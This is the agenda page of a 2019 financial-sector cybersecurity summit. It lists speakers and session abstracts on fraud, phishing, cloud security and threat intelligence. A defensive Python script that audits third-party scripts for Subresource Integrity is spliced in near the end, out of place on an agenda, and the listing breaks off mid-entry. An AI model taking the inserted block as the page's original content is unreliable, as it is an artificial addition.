Enduring Strength

Trust. Transform. Together.

Stay at the forefront of trends and challenges facing the financial sector through our curated and enriched content.

Our thought-provoking and interactive sessions cover relevant topics including fraud, threat intelligence, resiliency, cloud and outsourcing. Build stronger relationships over three days with around 800 thought leaders, executives and members by sharing best practices.

Uniquely designed for the financial sector, the 2019 Americas Fall Summit will provide you with actionable information needed to address evolving threats, develop new strategies and meet changing regulations. 

Interested in sponsoring a speaking session or more during the Summit? Learn more here
Sessions are grouped into tracks. This year's tracks can be found here.

View the current agenda-at-a-glance.

Members:

  • Platinum receive 10 complimentary passes
  • Gold receive five complimentary passes
  • Premier receive two complimentary passes

After all complimentary passes are utilized, additional staff may attend at a cost. 
Other membership tiers can attend at a cost.

Summit Sponsorship

View the Sponsor Prospectus, or email sales@fsisac.com to learn more.

Travel Information

Reserve Your Hotel Room

Marriott Marquis Washington D.C.
The cut-off date for our group hotel block has passed. Reservation requests received after 25 October are subject to space, room-type and price availability. If no rooms are available at the Marriott Marquis, please seek accommodations at a nearby hotel.

Reserve your room today. 

Airports

Ronald Reagan Washington National Airport
Distance: 4 miles
Drive Time: 15-20 minutes 

Dulles International Airport 
Distance: 27 miles 
Drive Time: 45 minutes

Program

Sunday 17 November

Program Note

Speaker & Session Updates

As of 1 November, speaker or session changes will not be reflected here, but will be updated in ExOrdo and the Summit app.

Program Note

Repeated Sessions

The Americas Fall Summit agenda has some sessions that are repeated. This is not because of a lack of quality content, but because of a room-capacity issue at the venue. Repeated sessions comprise only member sessions that received the highest ratings from our Americas Content Committee. We have repeated these sessions to ensure that Summit attendees have ample opportunity to see these speakers. We hope you understand and appreciate your support of our programs.

4:00 PM

Registration

5:30 PM

Around the World Welcome Reception

Monday 18 November

10:15 AM

Opening Remarks

10:45 AM

Opening Keynote: Gonzo Infosec Journalist Tells All

Brian Krebs - Investigative Reporter

Brian Krebs is an independent investigative reporter who writes about cybercrime at the award-winning Web site KrebsOnSecurity.com.

Formerly with The Washington Post (1995 to 2009), Krebs is probably best known for breaking stories on high-profile data breaches, including those that hit Target, Home Depot, Michaels and Ashley Madison.

A frequent interviewee and public speaker, Krebs has been profiled by 60 Minutes, The New York Times, Poynter.org and Business Week. Krebs’s book, Spam Nation: The Inside Story of Organized Cybercrime - From Global Epidemic to Your Front Door – is now a New York Times bestseller.

In January 2015, the National Press Foundation announced it was awarding Krebs its Chairman's Citation, an award designed to "recognize individuals whose accomplishments fall outside the traditional categories of excellence." In October 2014, the Association of Certified Fraud Examiners gave Krebs the "Guardian Award," an honor given annually to a journalist "whose determination, perseverance and commitment to the truth have contributed significantly to the fight against fraud."

Krebs graduated in 1994 from George Mason University, where he earned a Bachelor of Arts in International Studies.

11:30 AM

Fighting BEC Cybercrime at Scale

Mr. Crane Hassold, Agari

Phishing via non-technical social engineering methods such as business email compromise costs businesses $1.2 billion a year. Presenters will cover why phishing is so effective and how cybercriminals have evolved their tactics to exploit organizations' weakest defenses — humans. Attendees will gain insights into the latest research into cybercrime organizations and get an overview of how the industry can thwart emerging phishing threats through collaboration with financial institutions and law enforcement.

12:00 PM

Lunch

1:00 PM

How ERP Risks Are Leaving Your Business Exposed to Fraud

Mr. Jason Fruge, Onapsis, Inc.

A recent survey of IT executives of 430 North American organizations found that 70 percent of those companies suffered a breach of their Enterprise Resource Management (ERP) systems in the last two years. Attendees will explore five of the most common vulnerabilities impacting ERP and how they can be exploited to modify financial systems and inform insider trading. The session will also review how cybersecurity professionals can collaborate with IT, application and GRC teams to assess their organization's exposure to those material risks.

1:00 PM

Compliance in Cloud: Paced Migration is Key

Mr. Amandeep Lamba, PwC and Mr. Rinaldi Rampen, Fannie Mae

When presented with the benefits of cloud, many companies attempt to transition too quickly and don't fully consider how their migration will impact security, operational risk and compliance requirements. In this session, attendees will explore how to manage risks using a "go slow-to-go fast" strategy that focuses on understanding how migration will affect their security and compliance profile. Presenters will also provide advice on establishing the necessary governance and controls before migration takes place.

1:00 PM

The Evolution of Authentication

Mr. Bojan Simic, HYPR and Mr. Ed Amoroso, TAG

As enterprises move to the cloud, the perimeter fades and the attack surface gets larger. Modern tools such as SNIPR and Modlishka have made it easier for hackers to launch large-scale automated attacks, bringing credential re-use and two-factor-authentication attacks to record highs. How did we get here, and will mainstream adoption of password-less security have a positive or negative impact? This session explores how the rise of virtual desktop infrastructure has affected workstation login and reviews how the evolution of authentication has impacted enterprises' identity-and-access-management systems.

1:00 PM

Protecting your Riskiest Asset in the Cloud: Office 365

Mr. Kenneth Crist, GEICO

Close to 90 percent of breaches include a phishing or pretexting component, with email as a primary vector. Between these threats and business email compromise, many view cloud-based email as too risky. As organizations move their email from on-premises to cloud-based, they must reevaluate security controls. This session will highlight the challenges and solutions Geico discovered to securing the cloud. Attendees will gain a better understanding of the choices available for cloud security such as networking, conditional access, classification, email protection, authentication and encryption within Office 365.

1:00 PM

CyberSaucier: The Automated Army of Cyber Analysts

Mr. Justin Borland, Barclays and Mr. David Heise, Barclays

CyberSaucier allows security operations teams to apply complicated de-obfuscation and enrichment routines to arbitrary data sources, en masse. Security operations teams can build on their knowledge by running alert data against hundreds of recipes in near real-time. At Barclays, CyberSaucier is helping triage millions of alerts per week, providing the output of more than 200 cyber-analysts working 24/7. Whether it's WAF logs, IDS alerts, web logs or raw packet data, presenters will share how CyberSaucier can automate enhancement of incidents and alerts, allowing analysts to focus on previously unseen attacks. Attendees will understand how to apply this analysis pipeline to their own data.

1:00 PM

S&P's Journey to Build a Security-First Culture

Mr. Aaron Katz, SP Global and Ms. Megan Kaczanowski, SP Global

Security teams often feel they are fighting a losing battle against their users. Developers don’t listen and business leaders just accept risk. It’s not that users don’t care; it’s that they lack context to understand why they should care. This session explores how one corporation was able to take a small presentation about cybersecurity risks and turn it into a security champions program by engaging and empowering developers and business leaders to understand why security is so important. Attendees will leave with actionable tips for implementing similar programs in their own organizations.

1:00 PM

Synthetic Identities and Entities: Chasing Fraudulent Ghosts

Mr. Steve Lenderman, ADP

Synthetic identities are the biggest threat to the financial sector since identity theft boomed in the 1990s. This session explores the foundation of credit, the regulatory environment and how the current credit bureaus and data aggregators are manipulated to create synthetic identities. Attendees will review the underlying datapoints that build financial identities, data sources that aggregate them and how fraudsters are leveraging this information.

1:00 PM

Threat-Driven Network Defense at Scale

Mr. Harley Parks, The Johns Hopkins Applied Physics Laboratory

In today's evolving and complex threat landscape, there is a desire to automate, share, detect and respond to as much as possible, as fast as possible. Attendees will hear how to do so in a way that increases the effectiveness of operations. Presenters will share lessons learned from experiments aimed at defining ways to share adversary TTPs optimized for network defenders, and defensive workflows for TTP investigation and mitigation.

1:00 PM

The Prospective of a Russian Cyber Threat to the Financial Sector

Mr. Levi Maxey, FSARC and Mr. Samuel Alexander, Fannie Mae

This FSARC Intelligence briefing, a product of collaboration between the FSARC Intelligence Team, FSARC member firms, FS-ISAC and US government partners, examines Russia's strategic intentions as well as the Russian government's cyber capabilities and historical targeting of critical infrastructure, particularly the financial sector. The briefing outlines the geopolitical circumstances in which Russia may seek to cause destabilizing impacts to the US financial sector through cyber means. It also suggests a series of Watch Items designed to flag developments that, alone or in aggregate, could indicate Russia's intention to engage in disruptive or destructive cyber operations against US financial sector targets, with potentially systemic cascading harm to US economic stability and national security. This assessment provides context for financial sector decision-makers to understand the possible systemic threat from Russian state-sponsored cyber campaigns and to inform security within their respective institutions.

2:00 PM

Securing and Governing Azure Workloads

Ms. Lisa Lee, Microsoft

How can a business be sure it's securely operating workloads in the cloud? Your team may have the skills and maturity, but what sources should you be relying on for your configurations? Attendees will identify valuable resources that can help businesses secure and govern Azure cloud workloads, as well as needed reference documents, such as benchmarks, for secure deployment. Attendees will review blueprints specifically designed for FFIEC and PCI compliance, to accelerate certification and compliance and create consistent and repeatable environments.

2:00 PM

Rising Digital Platforms and the API Economy

Mr. Joe Diamond, Okta, Mr. Charlie Jacco, KPMG, and Mr. Vishnu Allaparthi, PWC

Digital experiences and API-driven innovation are the future of banking and finance. Consumers are demanding the ability to connect to financial service providers through online and mobile channels with anytime, anywhere accessibility. Forward-thinking companies are partnering with non-traditional players to offer new products and services and deploying APIs to build integrated application ecosystems. In this session, attendees will discuss the challenges and implications of shifting toward digital platforms and reaching untapped markets.

2:00 PM

Optimizing Workflow via Fusion of Threat Intel and Incident Response

Ms. Katie Kusjanovic, EclecticIQ

In financial services, there are more fusion centers than SOCs. With this matured evolution, the divergent workflows of threat intelligence practitioners and incident response analysts have begun to overlap and converge. The progression of threat intelligence in the fusion center is a primary contributor to the blurring lines. Attendees will dissect an abstracted version of the previous generation threat intelligence and incident-response disciplines and explore how the two workflows can cooperate in the context of a breach.

2:00 PM

Reducing Risk Through Sender ID Authentication

Mr. Alexander García-Tobar, Valimail and Mr. Shaun Khalfan, Freddie Mac

Sender identity, or lack thereof, is the key to slipping past current email defenses. According to a March 2019 study from Barracuda, 83% of all phishing attacks involve brand impersonation, and another 6% were impersonations of trusted individuals, like your CFO. Another report from July 2019, from Great Horn, found that 43% of email attacks were impersonations of people trusted by the recipient, and that this was the most effective type of phishing attack. While most attempts to stop this kind of phishing focus on user training, this approach just winds up blaming the victim. There is a better solution: validating sender identity. This session reviews how Freddie Mac implemented a cloud-based sender identity solution that does not require exposing any personal information from the contents of email messages.

2:00 PM

Save the Person, Save the Bank

Mr. Scott Alston, Bank of America and Mr. Edward Traywick, Bank of America

When it comes to insider threats, much attention is focused on reacting to an incident. Save the person, save the bank is a concept designed to benefit not only an organization, but also its employees. In an effort to move toward a more pre-emptive model, the primary emphasis should be on educating the workforce on how to recognize and report signs of employees who may be experiencing significant distress—while protecting the individual’s privacy. Attendees will hear how by taking this proactive approach, the bank is helping to prevent potential malicious acts, mitigate risk and reinforce that it cares about its people.

2:00 PM

Actually Achieving Diversity

Mr. Jonathan Shiflet, PNC Financial Group, Mr. Samuel Strohm, PNC Financial Group, and Ms. Annie Howard, PNC Financial Group

Everyone agrees that having a diverse team improves performance, yet many banks struggle with executing on this. PNC’s Security Defense Office more than meets the current industry standard of 20 percent diversity in the workforce and 4 percent diversity in leadership roles. This session reviews how one bank fostered an inclusive culture to attract and retain diverse candidates. By prioritizing curiosity and drive and leveraging core subject matter experts to train new hires, the institution’s security defense office built an industry-leading intelligence unit, a growing security operations center and a mature attack surface management pillar.

2:00 PM

(Repeat) Synthetic Identities and Entities: Chasing Fraudulent Ghosts

Mr. Steve Lenderman, ADP

Synthetic identities are the biggest threat to the financial sector since identity theft boomed in the 1990s. This session explores the foundation of credit, the regulatory environment and how the current credit bureaus and data aggregators are manipulated to create synthetic identities. Attendees will review the underlying datapoints that build financial identities, data sources that aggregate them and how fraudsters are leveraging this information.

2:00 PM

(Repeat) S&P's Journey to Build a Security-First Culture

Mr. Aaron Katz, SP Global and Ms. Megan Kaczanowski, SP Global

Security teams often feel they are fighting a losing battle against their users. Developers don’t listen and business leaders just accept risk. It’s not that users don’t care; it’s that they lack context to understand why they should care. This session explores how one corporation was able to take a small presentation about cybersecurity risks and turn it into a security champions program by engaging and empowering developers and business leaders to understand why security is so important. Attendees will leave with actionable tips for implementing similar programs in their own organizations.

2:45 PM

Networking Break

3:15 PM

Implementing Security Metrics that Matter

Mr. Nik Whitfield, Panaseer

Financial institutions must use metrics to understand how assets and controls are measured and reported. Attendees will hear how FIs are implementing continuous controls, including an accountability matrix for business areas and controls to improve metrics, illustrating how to overcome initial politics and disruption tactics. Presenters will also explain the value role-based metrics play in reducing risk and the concepts behind the Security Knowledge Graph and entity-centric risk.

3:15 PM

The SOC Triad: Creating Functional Harmony

Mr. Chris Morales, Vectra

In music, a triad is a set of three notes (or pitch classes) that can be stacked vertically in thirds to create a “harmonic triad.” In security operations, the SOC triad provides greater visibility into your environment by harmonizing three distinct capabilities – NDR, EDR and SIEM – reducing the likelihood of a bad actor staying hidden for an extended period of time. This session explores how Dun & Bradstreet’s security operations designed a SOC visibility triad to gain visibility across data centers and global office locations, while also integrating that approach into day-to-day operational practices. This discussion delivers practical best practices that offer SOCs increased threat visibility, detection, response, investigation and remediation powers.

3:15 PM

(Repeat) Protecting your Riskiest Asset in the Cloud: Office 365

Mr. Kenneth Crist, GEICO

Close to 90 percent of breaches include a phishing or pretexting component, with email as a primary vector. Between these threats and business email compromise, many view cloud-based email as too risky. As organizations move their email from on-premises to cloud-based, they must reevaluate security controls. This session will highlight the challenges and solutions Geico discovered to securing the cloud. Attendees will gain a better understanding of the choices available for cloud security such as networking, conditional access, classification, email protection, authentication and encryption within Office 365.

3:15 PM

Industry vs. Fraudsters: Who’s Winning the Battle for Payments?

Mr. Jim Cunha, Federal Reserve Bank of Boston

Synthetic identities are increasingly used to commit payments fraud, yet this type of fraud can be difficult to prevent or detect. Inconsistencies in definitions and detection approaches leave the industry with little capacity to identify and address payments fraud trends on a timely basis. During this session, attendees will hear from Senior Vice President of Treasury and Financial Services, Jim Cunha, on the work being done to better understand and battle this fast-growing threat to the U.S. payment system.

3:15 PM

Successfully Building a TIP

Mr. Jonathan Shiflet, PNC Financial Group, Mr. Adam Perino, Wells Fargo and Mr. Shahan Sudusinghe, JPMC

It’s become industry standard for intelligence organizations to acquire or build a Threat Intelligence Platform (TIP). Acquiring a TIP is only half of a complicated, difficult struggle toward automated intelligence operations. This presentation will cover key milestones and the stumbling blocks to avoid to effectively deploy a TIP. Presenters will also discuss choosing the right tool for your environment and organization and getting the TIP to not only ingest, but also produce, actionable intelligence across multiple customers.

3:15 PM

Traveling is Risky Business: Developing a High-Risk Travel Program

Ms. Deborah Janeczek, American Express and Aaron Brown, American Express

Cyberthreats increase as organizations grow and do business in high-risk countries. To combat threats, information security and risk personnel need to work with their institution to develop a high-risk travel program. In this session, presenters will share how their company developed its high-risk travel program, including how to determine high-risk countries and educate business travelers, while protecting and monitoring corporate devices.

3:15 PM

Making Cloud the Most Secure Environment for Financial Services

Mr. Rajiv Gupta, McAfee and Dr. Alissa Abdullah, Mastercard

For financial institutions, developing an innate understanding of where and how they could encounter cyber-risk is of primary importance. Security teams must continuously strive to fulfill their fiduciary and regulatory responsibilities, while also meeting increasing expectations for consumer privacy and innovative business solutions. In this session, presenters will cover best practices for securing the cloud, starting with visibility and control of cloud and web services and understanding which cloud services are in use and how.

3:15 PM

Lessons Learned from Building an External Engagement Intel Program

Mr. Sam Alexander, Fannie Mae

This presentation will explore Fannie Mae's development and operation of an external engagement program within Fannie Mae's Cyber Intelligence Team. It will discuss our experiences in building relationships with a variety of government stakeholders and sector partners, the collection and processing of threat intelligence data from these sources, and the analysis of and feedback on data received from government and sector sources. We will also explore how we created a return on investment from traditionally less-prioritized sources of information, such as classified briefings and participation in formal government-sponsored information sharing programs. Finally, we will explore Fannie Mae's effort to build collaborative information sharing relationships with small and medium financial institutions that leverage its Desktop Underwriter service, in order to raise the security posture across the mortgage industry and develop relationships before a threat event occurs.

4:15 PM

Silver Showcase: Hardware-Enforced Web Isolation

Mr. James Derbyshire, Garrison Technology

4:15 PM

Silver Showcase: Destructive Malware – Lessons from the Trenches

Mr. Charles DeBeck, IBM

4:15 PM

Silver Showcase: Stopping Malicious Automated Bots with Innovative Strategies

Mr. Shreyans Mehta, Cequence Security

4:15 PM

Silver Showcase: Freezing Financial Fraud: Putting Theft through Email on Ice

Mr. Bhagwat Swaroop, Proofpoint, Inc.

4:15 PM

Silver Showcase: Banks Can Optimize Resources, Reduce Risk with SOAR

Mr. Greg Bammel, Swimlane

4:15 PM

Silver Showcase: Not Your Average TIP: Meet Scout Threat

Mr. Dan Martin, LookingGlass Cyber Solutions

4:15 PM

Silver Showcase: Client-Side Website Security - A Threat to E-Commerce

Mr. Aanand Krishnan, Tala Security

5:15 PM

Reception

7:00 PM

Signature Event Dinner

Tuesday 19 November

7:00 AM

Breakfast

8:00 AM

Opening Remarks

8:15 AM

Threat Hunting at Speed and Scale

Mr. Will Farrell, Booz Allen Hamilton, Mr. Jay Novak, Booz Allen Hamilton and Ms. Lauren Clark, Thomson Reuters

Threat hunting is a powerful tool in an intelligence-centric security operations team. However, many teams take an unstructured approach, which takes more effort to find the adversary than it does for the adversary to change its TTP. By implementing a process around use-case creation, capturing and reusing hunt tradecraft and focusing on the best sources of data, teams can reduce the cost of the hunt team. In this session, attendees will learn how to transform hunt operations by leveraging endpoint detection and response telemetry data and review detailed analysis of vendor-agnostic hunt use cases.

8:45 AM

3 Musts to Reduce the Infrastructural Attack Surface

Mr. Tom Gillis, VMware

The biggest challenge to safeguarding against threats that get past perimeter defenses remains the industry’s hyper-focus on reacting to threats, instead of identifying new ways to shrink the attack surface. IT leaders must make gains in accurately characterizing modern applications and then use that understanding to harden the underlying infrastructure. Attendees will review how defenders can approach perimeter defense more proactively.

9:45 AM

Networking Break

10:00 AM

Hacking Misconceptions: Lessons Learned Building a Penetration Testing Program

Mr. Sean O'Coiligh, DTCC

This session addresses the initial challenges experienced in implementing and maturing a penetration testing program: its optics, perceptions, metrics, compliance, reporting, driving remediation, collaboration with other teams, dealing with audit, defining and demonstrating value, and defining what "penetration testing" means in our environment.

10:00 AM

Could Hackers Solve the Cybersecurity Skills Shortage?

Mr. Luke Tucker, HackerOne

While there are many theories around why there’s a cybersecurity skills gap, there are only a few solutions offered. Attendees will discuss how organizations can fill cybersecurity gaps by looking beyond traditional channels, toward hackers themselves. By the end of 2020, more than 1 million hackers are expected to be registered as part of the self-employed workforce.

10:00 AM

Questions Every CEO Should Ask about Cyber Risks

Mr. Jonathan Halperin, Cybersecurity and Infrastructure Security Agency (DHS)

Cyberthreats affect businesses of all sizes and require the attention and involvement of CEOs and other senior leaders. To help companies understand their risks and better prepare for cyberthreats, CEOs should discuss key cybersecurity risk management topics with their leadership and implement cybersecurity best practices. Presenters will share best practices from CISA guidance, “Questions Every CEO Should Ask About Cyber Risks,” based on lessons learned from incident response activities and managing cyber-risk.

10:00 AM

From Admin to Endpoint: Beating Security Systems

Mr. Etay Maor, Intsights

Cybercriminals have been at war with security systems for over a decade. However, the cat-and-mouse game between defenders securing a system and attackers finding a hole and taking advantage of it does not seem to have an end in sight. Research of Dark Web forums has revealed an uptick in a new type of offering: admin accounts. These accounts are auctioned and sold in closed forums for thousands of dollars. In this session we will explore these offerings from three perspectives: (1) The actual offering on the Dark Web. We will take a tour of several underground markets and expose what they offer. (2) The defenders. We will discuss why security systems fail when it comes to anomaly and threat detection. We will look at the techniques cybercriminals use to bypass different types of solutions and processes. (3) The target. We will demonstrate how, using OSINT, attackers can collect a wealth of information and create a full intel package targeting admins. Admins are humans too: they fall for social engineering, phishing and other scams.

10:00 AM

Leveraging MITRE's ATT&CK Framework to Transform Cyber Defense

Mr. Kenneth Crist, GEICO

MITRE's ATT&CK framework is widely used; however, tangible ways to apply ATT&CK have proven problematic. Presenters will discuss how their organization adopted ATT&CK as its central framework for guiding its threat defense strategy. They will review how Geico leverages ATT&CK to track threat actors, guide security spending, predict the (near) future, save limited resources and measure program efficacy. Beyond simply an overview and organizational structure, attendees will identify implementation issues, current progress and lessons learned.

10:00 AM

Synthetic Identity: Are You Who You Say You Are?

Mr. Kevin Thomsen, Bank of America

This session provides attendees with an overview of synthetic identity: a combination of fabricated credentials where the implied identity is not associated with a real person. Presenters will explain how fraudsters are exploiting this gap for financial gain and why synthetic identity is a blind spot for some financial institutions, due to organizational structure. The session will conclude with the latest on what's being done at the industry level and a high-level overview of what the banks are doing to mitigate risk.

10:00 AM

The Network Perimeter Protection Tool Known as Jack-a-Mole

Mr. Yu Peng, Intercontinental Exchange and Mr. Paul Braxton, Intercontinental Exchange

Since the dawn of internet security, firms have struggled to react effectively to hostile IP addresses. Additionally, the amount of data teams need in order to proactively block IP addresses has increased exponentially with the maturation of information sharing communities, threat intelligence and ever-increasing IOC ingestion. Presenters will go over the design, implementation and tuning of a behavior- and reputation-based network perimeter protection tool called Jack-a-Mole (JAM). Attendees will hear about the challenges and compromises required for successful execution.

11:00 AM

Building the Bridge between Security and the Business

Ms. Jennifer Gagnon, PNC Bank and Ms. Kathleen Darroch, PNC Bank

Security teams are looked at as a cost center, whereas the business side of the bank brings in the money. This session will focus on building relationships between the two. Attendees will review techniques and use-cases that helped PNC break down walls between departments and build partnerships among fraud, cyber and the business. Presenters will also discuss how security teams can actually help the business team engage customers in ways that turn security from a cost center to a revenue generator.

11:00 AM

(Repeat) Questions Every CEO Should Ask about Cyber Risks

Mr. Jonathan Halperin, Cybersecurity and Infrastructure Security Agency (DHS)

Cyberthreats affect businesses of all sizes and require the attention and involvement of CEOs and other senior leaders. To help companies understand their risks and better prepare for cyberthreats, CEOs should discuss key cybersecurity risk management topics with their leadership and implement cybersecurity best practices. Presenters will share best practices from CISA guidance, “Questions Every CEO Should Ask About Cyber Risks,” based on lessons learned from incident response activities and managing cyber-risk.

11:00 AM

Ripple Effects from Breaches and Disruptions in the Finance Sector

Mr. Kelly White, RiskRecon

Many published studies offer statistics about breaches that directly impact financial organizations. But very little analysis has been done on the long-term, downstream “ripple effects" associated with those breaches. This session reviews analysis of more than 70,000 security incidents, including a deep dive into over 800 that contain detailed information about the breadth of the ripple effects, the firms impacted, the firms that trigger these security incidents and the associated financial losses.

11:00 AM

(Repeat) Hacking Misconceptions: Lessons Learned Building a Penetration Testing Program

Mr. Sean O'Coiligh, DTCC

This session addresses the initial challenges experienced while implementing and maturing a penetration testing program: its optics and perceptions, metrics, compliance, reporting, driving remediation, collaboration with other teams, dealing with audit, defining and demonstrating value, and defining what "penetration testing" means in the presenter's environment.

11:00 AM

(Repeat) Leveraging MITRE's ATT&CK Framework to Transform Cyber Defense

Mr. Kenneth Crist, GEICO

MITRE's ATT&CK framework is widely used; however, tangible ways to apply ATT&CK have proven elusive. The presenter will discuss how GEICO adopted ATT&CK as the central framework guiding its threat defense strategy, and will review how GEICO uses ATT&CK to track threat actors, guide security spending, anticipate near-term threats, conserve limited resources and measure program efficacy. Beyond an overview of the framework and its structure, attendees will hear about implementation issues, current progress and lessons learned.

11:00 AM

FS-ISAC Information Sharing Best Practices Document & Practical Tips

Mr. Kyle Davis, Target Corporation and Mr. John Suver, Bank of America

This presentation will introduce members to the FS-ISAC Information Sharing Best Practices document, which will be newly updated in time for the Fall Summit. In addition, the presentation will discuss practical approaches to overcoming common obstacles and objections related to information sharing.

11:00 AM

High-Impact Strategies to Close the Visibility Gap in Security

Mr. Joe Partlow, ReliaQuest

11:45 AM

Innovative Showcase Lunch: Firmware: The Unprotected Attack Surface

Mr. Yuriy Bulygin, Eclypsium

11:45 AM

Innovative Showcase Lunch: Identity: The Key to Modernization and Unlocking Innovation

Mr. Richard Bird, Ping Identity

11:45 AM

Innovative Showcase Lunch: Security Instrumentation Is the Future of All Software

Mr. Jeff Williams, Contrast Security

11:45 AM

Innovative Showcase Lunch: Intercepting the Hack and Controlling Outcomes

Ms. Neill Sciarrone, Trinity Cyber Inc

11:45 AM

Innovative Showcase Lunch: Keys to the Cloud (and Everything Else)

Mr. David Greene, Fortanix

11:45 AM

Innovative Showcase Lunch: Fighting Cyber Attacks With Game Theory

Mr. Michael Fabrico, TrapX

1:15 PM

Today's Fraud Prevention Requires More Than Mere Bot Mitigation

Mr. Dan Woods, Shape Security

Fraud losses from account takeover and imitation attacks are on the rise, as is the security community’s understanding of these threats. Sixty-five percent of all traffic on banks’, credit-card issuers’ and money transmitters’ websites is non-human; but highly motivated and technical attackers are evolving beyond bots. This session will review how aggregators, man-in-the-browser attacks and manual labor are contributing to automation threats in a more costly and effective way.

1:15 PM

Use-Case for Simplifying Cybersecurity Regulatory Compliance

Ms. Nadya Bartol, BCG Platinion, Mr. Josh Magri, Bank Policy Institute - BITS, Mr. John Goodman, PenFed and Ms. Helene Kramer, DTCC

This session discusses the use-case for how adoption of the Financial Services Cybersecurity Framework Profile can simplify regulatory compliance and reduce costs. This profile is a scalable and extensible framework that financial institutions of all types can use for cyber-risk management, as well as a mechanism to evidence compliance with multiple regulations, including the FFIEC's CAT and HKMA's CRAF. It is based on NIST CSF and is compatible with ISO/IEC 27001 and 27002, and was developed over a two-year period by a coalition of various trade associations and 150 financial institutions. A brief description of the profile will be reviewed in this session, as will plans for its maintenance. Attendees can expect to gain a better understanding of how they can adopt the profile at their institutions to manage multiple regulatory drivers, improve cyber-risk management, and reduce compliance costs.

1:15 PM

(Repeat) Building the Bridge between Security and the Business

Ms. Jennifer Gagnon, PNC Bank and Ms. Kathleen Darroch, PNC Bank

Security teams are looked at as a cost center, whereas the business side of the bank brings in the money. This session will focus on building relationships between the two. Attendees will review techniques and use-cases that helped PNC break down walls between departments and build partnerships among fraud, cyber and the business. Presenters will also discuss how security teams can actually help the business team engage customers in ways that turn security from a cost center to a revenue generator.

1:15 PM

Partnering Offense and Defense: A Purple Team’s Journey

Mr. Chris Blow, Liberty Mutual and Mr. Brian Riley, Liberty Mutual

Internal red and purple teaming have seen a large uptick in popularity within the past five years. Unfortunately, not all implementations succeed, for reasons ranging from budgetary and scope constraints to a lack of forward-thinking vision, executive buy-in and structure. In this session, Liberty Mutual Insurance will share its purple team journey and how it has driven material improvements to its security program. Attendees will gain knowledge that will assist in creating a successful team of their own.

1:15 PM

Detecting Debit Card Fraud with Hands-On Data Science

Mr. Salil Jain, Aetna and Mr. Heath Henry, Aetna

Security vulnerabilities in a merchant's or card processor's payment card environment leave room for threat actors to exploit them, and the resulting data breaches are nearly impossible to detect until the stolen cards begin to be used for fraudulent purchases. This session will review how probabilistic correlation, the Jaccard (similarity) index, which measures the overlap between two sets as the size of their intersection divided by the size of their union, and manual investigation have helped issuers detect compromises and protect against fraud.

1:15 PM

Making a Cyber Awareness Program Sexy

Mr. Mandouh Csintalan, RenaissanceRe

Security often struggles to capture the attention of other departments. But when a security incident occurs, security teams get all of the attention, and oftentimes the blame. This session reviews how security departments can push cyber-awareness programs within their organizations before an incident happens. The financial-services industry is among the most targeted for sophisticated cyber-attacks. We must train colleagues to be an extension of our cyber-army to thwart attacks.

1:15 PM

Fraud Working Group Update -> Security/Fraud convergence

Mr. Matt Harper, Aflac

Continue the fraud working group conversation around the convergence of Security and Fraud, as well as other emerging topics.

2:15 PM

Using Behavior Analytics to Predict, Detect and Stop Insider Threats

Mr. Bryan Sheppard, State Farm

Conventional cybersecurity tools, such as those aimed at data-loss prevention, intrusion-prevention, security-information and event-management, and network-monitoring, focus on defending the perimeter and offer little in the way of protecting against insider threats. IT security teams cannot monitor every action taken by every employee, consultant and privileged user, using manual processes. In this session, attendees will explore State Farm’s insider threat program and learn how the company’s user and entity behavior analytics platform compares real-time user behavior to base-lined, normal behavior.

2:15 PM

Consequences of E-Commerce and External Suppliers on the Web

Mr. Brandon Dixon, RiskIQ

As the e-commerce side of businesses has grown, so have their functionality and services. Websites have come to rely heavily on ads, analytics and other outsourced services as part of that expansion, often without those third-party components being scrutinized. Attendees will hear how e-commerce supply chain attacks typically start, play out and impact organizations that have limited insight into these events.
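The first control a practitioner reaches for against the third-party script problem described above is an inventory of what the page actually loads, plus Subresource Integrity (SRI) pins on anything served from someone else's host. The block below is an added example written for this page, not material from the session or from RiskIQ: it lists every third-party `<script src>` that lacks an `integrity` attribute and shows how to compute and verify the `sha384-...` token browsers check. The HTML page and hostnames are constructed placeholders.

```python
"""Third-party script inventory and Subresource Integrity (SRI) checks.

Added example for the supply-chain problem above: list every <script src> a page loads from a
host other than its own that lacks an integrity attribute, and compute/verify SRI hashes so a
tampered CDN or tag file fails to load. The HTML below is constructed; hostnames are placeholders."""
import base64
import hashlib
import hmac
from html.parser import HTMLParser
from urllib.parse import urlparse

SRI_ALGOS = ("sha256", "sha384", "sha512")  # the only digest algorithms browsers accept for SRI


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Integrity token for a resource body, e.g. 'sha384-<base64 digest>'."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(body: bytes, integrity: str) -> bool:
    """True if body matches any token in a (possibly multi-hash) integrity attribute."""
    for token in integrity.split():
        algo = token.partition("-")[0]
        if algo in SRI_ALGOS and hmac.compare_digest(sri_hash(body, algo), token):
            return True
    return False


class _ScriptCollector(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        src = a.get("src")
        if not src:
            return  # inline scripts are first-party by definition
        host = urlparse(src).netloc.lower()
        self.scripts.append({
            "src": src,
            # relative URLs have no netloc; any other host counts as third party (subdomains included)
            "third_party": bool(host) and host != self.page_host,
            "has_sri": bool(a.get("integrity")),
            "crossorigin": a.get("crossorigin"),  # cross-origin SRI also needs crossorigin="anonymous"
        })


def audit_scripts(html: str, page_host: str):
    """Return third-party script tags with no integrity attribute, in document order."""
    collector = _ScriptCollector(page_host.lower())
    collector.feed(html)
    return [s for s in collector.scripts if s["third_party"] and not s["has_sri"]]


# --- constructed sample page -------------------------------------------------
_PINNED_ANALYTICS = sri_hash(b"/* analytics build 42 */")
SAMPLE_HTML = f"""
<html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.example.invalid/analytics.js"
        integrity="{_PINNED_ANALYTICS}" crossorigin="anonymous"></script>
<script src="//ads.example.invalid/tag.js"></script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for s in audit_scripts(SAMPLE_HTML, "shop.example.invalid"):
        print("no SRI on third-party script:", s["src"])
```

Two caveats worth stating: SRI only works for resources whose bytes are fixed at deploy time, so a tag manager or ad script that rewrites itself per request cannot be pinned and has to be controlled with a Content-Security-Policy `script-src` allowlist instead; and a pinned loader that itself fetches further scripts protects only the loader, not what it pulls in.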

2:15 PM

(Repeat) Detecting Debit Card Fraud with Hands-On Data Science

